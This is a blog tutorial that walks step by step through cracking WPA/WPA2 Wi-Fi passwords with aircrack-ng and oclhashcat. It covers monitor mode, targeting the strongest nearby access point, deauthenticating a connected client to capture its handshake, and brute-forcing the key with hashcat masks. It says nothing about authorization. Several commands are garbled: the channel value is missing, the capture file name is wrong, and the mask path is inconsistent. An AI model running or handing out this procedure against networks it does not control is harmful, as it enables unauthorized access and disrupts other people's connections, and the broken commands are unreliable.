How to Use GPU to Speed Up WPA/WPA2 Password Cracking


There are many ways to crack a WPA/WPA2 password. We all know that a GPU (Graphic Processing Unit) is way faster than a CPU in terms of computation. So, we’ll use the power of GPU to speed up WPA/WPA2 cracking.
The tools used will be (available for both windows and Linux.)
  1. Aircrack-ng
  2. Oclhashcat
This guide assumes the following things:
  • wlan0                             is a WiFi interface
  • mon0                             is the interface in monitor mode
  •                      refers to the channel the target Wi-Fi is operating on
  • 00:2d:37:4b:e4:d5      is the MAC address of target AP (access point) (not real)
  • cc:cc:4e:5b:d7:3d         is MAC of client associated with the target AP (not real)
  • # (hash symbol)           is used to mark start of a command

Open up a terminal
Start by putting Wi-Fi interface in monitor mode
#airmon-ng start wlan0
This puts Wi-Fi in monitor mode and creates a new interface mon0 to sniff traffic.
Then, start sniffing air for all AP’s in the area.
#airodump-ng mon0
This will give you information about all AP’s in your vicinity. Select one with highest strength and focus on that one.
Press Ctrl+C to stop above command and type:
#airodump-ng –c –bssid 00:2d:37:4b:e4:d5 –w mon0

This command only sniffs for one specific AP:
-c tells which channel to sniff
-bssid is the MAC of AP to target
-w tell to write a file to capture handshake (for later use in recovering password)
mon0 is the monitor interface

Notice the MAC address of clients shown in the terminal; we’ll need it for the next step.

Now, open a second terminal and type:
#aireplay-ng -0 5 –a 00:2d:37:4b:e4:d5 –c cc:cc:4e:5b:d7:3d mon0
This command says to de-authenticate a client from its AP
-0 tell how many time to send deauth signal (in this case 5 times)
-a tell the MAC of AP
-c tell the MAC of client connect to AP (Note: you can do a broadcast deauth, but it doesn’t work all the time. Target a specific client instead.)

mon0 is our interface. Once you see that airodump-ng shows Handshake captured in upper-right corner, stop the process (otherwise, it keeps deauthing the clients).
Once handshake file is captured and written (in format file.cap), clean the file using the following command:
#wpaclean clean_file.cap captured.cap
Here, clean_file.cap is output file. And, captured.cap is the input file (the file you captured).

Now, prepare the file for hashcat by:
#aircrack-ng clean_file.cap -J for_cat
Here, clean_file.cap is from previous step. And, for_cat is for hashcat use (it will automatically add .hccap extension)

Now, begin the cracking process by:
#oclhashcat –m 2500 –a 3 –session=my_session /for_cat.hccap /mymask.hcmask
Here, –m 2500 tell to crack WPA/WPA2
-a 3 tells to use brute-force or mask based brute force (more on it later)
-session=my_session tell to save the session (in case you plan to resume it later, it takes a very long time.)
/for_cat.hccap is path to your captured and cleaned prepared hashcat file
/mymask.hccap is path to the mask file

Once it’s done, the saved password will be stored in a .pot file (located in /usr/share/oclhashcat/ for kali)

The mask can take following format:
  • ?u for upper case letters (ABC…)
  • ?l for lower case letters (abc…)
  • ?d for numbers
  • ?s for symbols (ASCII only I think)
  • ?a use all of the above characters
Thus to create a mask type in a black file:
  • ?d?d?d?d?d?d?d?d for a 8 digit password

That’s it for this tutorial.

Subscribe to this Blog via Email :

Would love to here from you...